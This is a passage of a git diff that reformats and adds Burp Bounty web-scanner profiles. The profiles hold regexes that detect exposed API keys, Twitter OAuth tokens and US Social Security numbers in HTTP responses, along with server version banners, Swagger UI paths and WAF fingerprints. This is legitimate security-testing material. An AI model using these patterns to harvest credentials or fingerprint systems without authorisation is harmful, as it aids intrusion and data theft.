"Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)sonar.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{40}(\\\\\\\"|\u0027|`)?" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "SonarQube Api Key Docs", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/StackHawk_API_Key.bb b/profiles/StackHawk_API_Key.bb old mode 100644 new mode 100755 index bb4c49f..6cbde61 --- a/profiles/StackHawk_API_Key.bb +++ b/profiles/StackHawk_API_Key.bb @@ -1 +1,59 @@ -[{"Name":"StackHawk_API_Key","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"StackHawk API Key","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "StackHawk_API_Key", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,hawk\\.[0-9A-Za-z\\-_]{20}\\.[0-9A-Za-z\\-_]{20}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "StackHawk API Key", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Strict-Transport-Security.bb b/profiles/Strict-Transport-Security.bb new file mode 100755 index 0000000..5373b1e --- /dev/null +++ b/profiles/Strict-Transport-Security.bb @@ -0,0 +1,59 @@ +[ + { + "ProfileName": "Strict-Transport-Security", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@egarme", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,Strict-Transport-Security" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": true, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Strict-Transport-Security", + "IssueSeverity": "Information", + "IssueConfidence": "Firm", + "IssueDetail": "Security Header \"Strict-Transport-Security\" not present in response.", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Swagger-Finder.bb b/profiles/Swagger-Finder.bb index 47b178a..1dfc8f5 100755 --- a/profiles/Swagger-Finder.bb +++ b/profiles/Swagger-Finder.bb @@ -1 +1,69 @@ -[{"Name":"Swagger-Finder","Enabled":true,"Scanner":1,"Author":"@egarme","Payloads":["/swagger-ui.html","/swagger/swagger-ui.html","/api/swagger-ui.html","/swagger/index.html","/v1.0/swagger-ui.html","/v2.0/swagger-ui.html","/v3.0/swagger-ui.html"],"Encoder":[],"UrlEncode":false,"CharsToUrlEncode":"","Grep":["true,Or,id\u003d\"swagger"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"TimeOut":"","isTime":false,"contentLength":"","iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":false,"ContentType":"","NegativeCT":false,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":4,"MaxRedir":5,"payloadPosition":1,"payloadsFile":"","grepsFile":"","IssueName":"Swagger-Finder","IssueSeverity":"Low","IssueConfidence":"Firm","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","Header":[],"VariationAttributes":[],"InsertionPointType":[65],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Swagger-Finder", + "Name": "", + "Enabled": true, + "Scanner": 1, + "Author": "@egarme", + "Payloads": [ + "true,/swagger-ui.html", + "true,/swagger/swagger-ui.html", + "true,/api/swagger-ui.html", + "true,/swagger/index.html", + "true,/v1.0/swagger-ui.html", + "true,/v2.0/swagger-ui.html", + "true,/v3.0/swagger-ui.html" + ], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,id\u003d\"swagger" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": false, + "ContentType": "", + "HttpResponseCode": "", + "NegativeCT": false, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 0, + "RedirType": 4, + "MaxRedir": 5, + "payloadPosition": 1, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Swagger-Finder", + "IssueSeverity": "Low", + "IssueConfidence": "Firm", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [ + 65 + ], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Swagger_found.bb b/profiles/Swagger_found.bb old mode 100644 new mode 100755 index c4a84d2..172d442 --- a/profiles/Swagger_found.bb +++ b/profiles/Swagger_found.bb @@ -1 +1,59 @@ -[{"Name":"Swagger_found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,swagger-ui.html"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":1,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Swagger url found","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"Swagger url found","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Swagger_found", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,swagger-ui.html" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 1, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Swagger url found", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "Swagger url found", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Twitter_Client_ID.bb b/profiles/Twitter_Client_ID.bb old mode 100644 new mode 100755 index 2b34703..7705c60 --- a/profiles/Twitter_Client_ID.bb +++ b/profiles/Twitter_Client_ID.bb @@ -1 +1,59 @@ -[{"Name":"Twitter_Client_ID","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,(?i)twitter(.{0,20})?[\u0027\\\"][0-9a-z]{18,25}"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Twitter Client ID","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Twitter_Client_ID", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,(?i)twitter(.{0,20})?[\u0027\\\"][0-9a-z]{18,25}" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Twitter Client ID", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Twitter_OAuth.bb b/profiles/Twitter_OAuth.bb old mode 100644 new mode 100755 index 34e489b..a60d207 --- a/profiles/Twitter_OAuth.bb +++ b/profiles/Twitter_OAuth.bb @@ -1 +1,59 @@ -[{"Name":"Twitter_OAuth","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}[\u0027\\\"\\\\s][0-9a-zA-Z]{35,44}[\u0027\\\"\\\\s]"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Twitter OAuth","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Twitter_OAuth", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}[\u0027\\\"\\\\s][0-9a-zA-Z]{35,44}[\u0027\\\"\\\\s]" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Twitter OAuth", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/US_SSN.bb b/profiles/US_SSN.bb old mode 100644 new mode 100755 index 7d13eac..50861be --- a/profiles/US_SSN.bb +++ b/profiles/US_SSN.bb @@ -1 +1,60 @@ -[{"Name":"US_SSN","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,^((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})","true,Or,[^a-zA-Z0-9]((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":false,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"US SSN","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "US_SSN", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,^((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})", + "true,Or,[^a-zA-Z0-9]((?!0{3})(?!6{3})[0-8]\\d{2}-(?!0{2})\\d{2}-(?!0{4})\\d{4})" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": false, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "US SSN", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/Version_Headers.bb b/profiles/Version_Headers.bb old mode 100644 new mode 100755 index f1a3e46..3ebdf98 --- a/profiles/Version_Headers.bb +++ b/profiles/Version_Headers.bb @@ -1 +1,115 @@ -[{"Name":"Version_Headers","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,accounting\\.js v([\\d.]+)","true,Or,akka-http\\/([\\d.]+)","true,Or,Alterian-CME\\/([\\d.]+)","true,Or,([-\\d.]+)amzn1.x86_64","true,Or,AOLserver\\/([\\d.]+)","true,Or,Apache\\/([\\d.]+(?: \\([ \\w]+\\))?)","true,Or,Apache-Coyote\\/([\\d.]+)","true,Or,Apache Subversion\u003c\\/a\u003e\\s+version\\s+([\\d.]+(?:\\s*\\(r\\d+\\))?)","true,Or,Apache Tomcat\\/([\\d.]+)","true,Or,ARR\\/([\\d.]+)","true,Or,Artifactory\\/([\\d.]+)","true,Or,ASP\\.NET Version:([\\d.]+)","true,Or,awselb\\/([\\d.]+)","true,Or,((?i)Boa)\\/(\\d+\\.[\\d.rc]+)","true,Or,Cherokee\\/(\\d+\\.[\\d.b]+)(\\s+\\([a-zA-Z]+\\))?","true,Or,CKEDITOR.*version:\"([\\d.]+)\"","true,Or,Communique\\/([\\d.-]+)","true,Or,Ember\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]","true,Or,http:\\/\\/errors\\.angularjs\\.org\\/([\\d.]+)\\/","true,Or,h2o\\/([\\d.]+(-DEV)?)","true,Or,Hiawatha v([\\d.]+)","true,Or,Handlebars\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]","true,Or,IBM_HTTP_Server\\/([\\d.]+)","true,Or,IWeb\\/([\\d.]+)","true,Or,Jetty\\s?\\(?([a-z\\d.]+)\\)?","true,Or,JBoss-([\\d.]+(?:GA)?)","true,Or,JBoss-EAP\\/([\\d.]+)","true,Or,JBoss_([\\d_]+)","true,Or,JBPAPP_([\\d_]+(?:GA)?)","true,Or,JBoss\\s?Web[\\/-]{1}([\\d.]+(?:GA)?)","true,Or,\\bjdk(\\d[x\\d._]+)","true,Or,Joomla! ([\\d.]+)","true,Or,\\bJSF\\/([\\d.]+)","true,Or,JSP\\/([\\d.]+)","true,Or,jQuery JavaScript Library v([\\d.]+)","true,Or,jQuery UI ([\\d.]+)","true,Or,jQuery UI Core ([\\d.]+)","true,Or,jQuery UI Touch Punch ([\\d.]+)","true,Or,jQuery hashchange event - v([\\d.]+)","true,Or,jQuery Tiny Pub\\/Sub - v([\\d.]+)","true,Or,jquery[\\/-]([\\d-.]+)","true,Or,jQuery v([\\d.]+)","true,Or,Liferay Portal Enterprise Edition ([\\d.]+)","true,Or,lighttpd\\/([\\d.]+)","true,Or,Linux (\\d+\\.[a-z0-9\\.\\-_]+)","true,Or,LiteSpeed\\/([\\d.]+)","true,Or,Microsoft-HTTPAPI\\/([\\d.]+)","true,Or,Microsoft-IIS\\/([\\d.]+)","true,Or,Microsoft \\.NET Framework Version:([\\d.]+)","true,Or,Microsoft \\.NET Framework ([\\d.]+)","true,Or,MicrosoftSharePointTeamServices: ([\\d.]+)","true,Or,mod_apreq\\d-([\\d.\\/]+)","true,Or,mod_fastcgi\\/([\\d.]+)","true,Or,mod_jk\\/([\\d.]+)","true,Or,mod_ssl\\/([\\d.]+)","true,Or,mod_perl\\/([\\d.]+)","true,Or,mustache\\.version\\s*\u003d\\s*\u0027([\\d.]+)\u0027"],"Tags":["All"],"PayloadResponse":false,"NotResponse":false,"isTime":false,"iscontentLength":false,"CaseSensitive":false,"ExcludeHTTP":false,"OnlyHTTP":true,"IsContentType":true,"ContentType":"text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript","NegativeCT":true,"IsResponseCode":false,"ResponseCode":"","NegativeRC":false,"isurlextension":false,"NegativeUrlExtension":false,"MatchType":2,"RedirType":0,"MaxRedir":0,"payloadPosition":0,"grepsFile":"","IssueName":"Version in Headers","IssueSeverity":"Information","IssueConfidence":"Certain","IssueDetail":"","RemediationDetail":"","IssueBackground":"","RemediationBackground":"","VariationAttributes":[],"InsertionPointType":[],"Scantype":0,"pathDiscovery":false}] \ No newline at end of file +[ + { + "ProfileName": "Version_Headers", + "Name": "", + "Enabled": true, + "Scanner": 2, + "Author": "@six2dez1", + "Payloads": [], + "Encoder": [], + "UrlEncode": false, + "CharsToUrlEncode": "", + "Grep": [ + "true,,accounting\\.js v([\\d.]+)", + "true,Or,akka-http\\/([\\d.]+)", + "true,Or,Alterian-CME\\/([\\d.]+)", + "true,Or,([-\\d.]+)amzn1.x86_64", + "true,Or,AOLserver\\/([\\d.]+)", + "true,Or,Apache\\/([\\d.]+(?: \\([ \\w]+\\))?)", + "true,Or,Apache-Coyote\\/([\\d.]+)", + "true,Or,Apache Subversion\u003c\\/a\u003e\\s+version\\s+([\\d.]+(?:\\s*\\(r\\d+\\))?)", + "true,Or,Apache Tomcat\\/([\\d.]+)", + "true,Or,ARR\\/([\\d.]+)", + "true,Or,Artifactory\\/([\\d.]+)", + "true,Or,ASP\\.NET Version:([\\d.]+)", + "true,Or,awselb\\/([\\d.]+)", + "true,Or,((?i)Boa)\\/(\\d+\\.[\\d.rc]+)", + "true,Or,Cherokee\\/(\\d+\\.[\\d.b]+)(\\s+\\([a-zA-Z]+\\))?", + "true,Or,CKEDITOR.*version:\"([\\d.]+)\"", + "true,Or,Communique\\/([\\d.-]+)", + "true,Or,Ember\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]", + "true,Or,http:\\/\\/errors\\.angularjs\\.org\\/([\\d.]+)\\/", + "true,Or,h2o\\/([\\d.]+(-DEV)?)", + "true,Or,Hiawatha v([\\d.]+)", + "true,Or,Handlebars\\.VERSION\\s*\u003d\\s*[\"\u0027]([\\w.]+)[\"\u0027]", + "true,Or,IBM_HTTP_Server\\/([\\d.]+)", + "true,Or,IWeb\\/([\\d.]+)", + "true,Or,Jetty\\s?\\(?([a-z\\d.]+)\\)?", + "true,Or,JBoss-([\\d.]+(?:GA)?)", + "true,Or,JBoss-EAP\\/([\\d.]+)", + "true,Or,JBoss_([\\d_]+)", + "true,Or,JBPAPP_([\\d_]+(?:GA)?)", + "true,Or,JBoss\\s?Web[\\/-]{1}([\\d.]+(?:GA)?)", + "true,Or,\\bjdk(\\d[x\\d._]+)", + "true,Or,Joomla! ([\\d.]+)", + "true,Or,\\bJSF\\/([\\d.]+)", + "true,Or,JSP\\/([\\d.]+)", + "true,Or,jQuery JavaScript Library v([\\d.]+)", + "true,Or,jQuery UI ([\\d.]+)", + "true,Or,jQuery UI Core ([\\d.]+)", + "true,Or,jQuery UI Touch Punch ([\\d.]+)", + "true,Or,jQuery hashchange event - v([\\d.]+)", + "true,Or,jQuery Tiny Pub\\/Sub - v([\\d.]+)", + "true,Or,jquery[\\/-]([\\d-.]+)", + "true,Or,jQuery v([\\d.]+)", + "true,Or,Liferay Portal Enterprise Edition ([\\d.]+)", + "true,Or,lighttpd\\/([\\d.]+)", + "true,Or,Linux (\\d+\\.[a-z0-9\\.\\-_]+)", + "true,Or,LiteSpeed\\/([\\d.]+)", + "true,Or,Microsoft-HTTPAPI\\/([\\d.]+)", + "true,Or,Microsoft-IIS\\/([\\d.]+)", + "true,Or,Microsoft \\.NET Framework Version:([\\d.]+)", + "true,Or,Microsoft \\.NET Framework ([\\d.]+)", + "true,Or,MicrosoftSharePointTeamServices: ([\\d.]+)", + "true,Or,mod_apreq\\d-([\\d.\\/]+)", + "true,Or,mod_fastcgi\\/([\\d.]+)", + "true,Or,mod_jk\\/([\\d.]+)", + "true,Or,mod_ssl\\/([\\d.]+)", + "true,Or,mod_perl\\/([\\d.]+)", + "true,Or,mustache\\.version\\s*\u003d\\s*\u0027([\\d.]+)\u0027" + ], + "Tags": [ + "All" + ], + "PayloadResponse": false, + "NotResponse": false, + "TimeOut1": "", + "TimeOut2": "", + "isTime": false, + "contentLength": "", + "iscontentLength": false, + "CaseSensitive": false, + "ExcludeHTTP": false, + "OnlyHTTP": true, + "IsContentType": true, + "ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2,application/javascript", + "HttpResponseCode": "", + "NegativeCT": true, + "IsResponseCode": false, + "ResponseCode": "", + "NegativeRC": false, + "urlextension": "", + "isurlextension": false, + "NegativeUrlExtension": false, + "MatchType": 2, + "Scope": 2, + "RedirType": 0, + "MaxRedir": 0, + "payloadPosition": 0, + "payloadsFile": "", + "grepsFile": "", + "IssueName": "Version in Headers", + "IssueSeverity": "Information", + "IssueConfidence": "Certain", + "IssueDetail": "", + "RemediationDetail": "", + "IssueBackground": "", + "RemediationBackground": "", + "Header": [], + "VariationAttributes": [], + "InsertionPointType": [], + "Scanas": false, + "Scantype": 0, + "pathDiscovery": false + } +] \ No newline at end of file diff --git a/profiles/WAF_Found.bb b/profiles/WAF_Found.bb old mode 100644 new mode 100755 index bd3d2d2..76db5cc --- a/profiles/WAF_Found.bb +++ b/profiles/WAF_Found.bb @@ -1 +1,165 @@ -[{"Name":"WAF_Found","Enabled":true,"Scanner":2,"Author":"@six2dez1","UrlEncode":false,"Grep":["true,Or,Cloudflare","true,Or,Imperva","true,Or,NetScaler","true,Or,wzws-waf-cgi","true,Or,X-Powered-By-360WZB","true,Or,aeSecure","true,Or,AL-SESS","true,Or,aliyun","true,Or,Anquanbao","true,Or,WZWS-RAY","true,Or,ArvanCloud","true,Or,ASPA-Cache-Status","true,Or,X-ASPNET-Version","true,Or,cz_astra_csrf_cookie","true,Or,awselb/2.0","true,Or,Yunjiasu","true,Or,barracuda_","true,Or,barra_counter_session","true,Or,BinarySec","true,Or,BigIP","true,Or,BlockDos.net","true,Or,BDWAF","true,Or,CdnNsWAF","true,Or,ChinaCache","true,Or,ACE XML 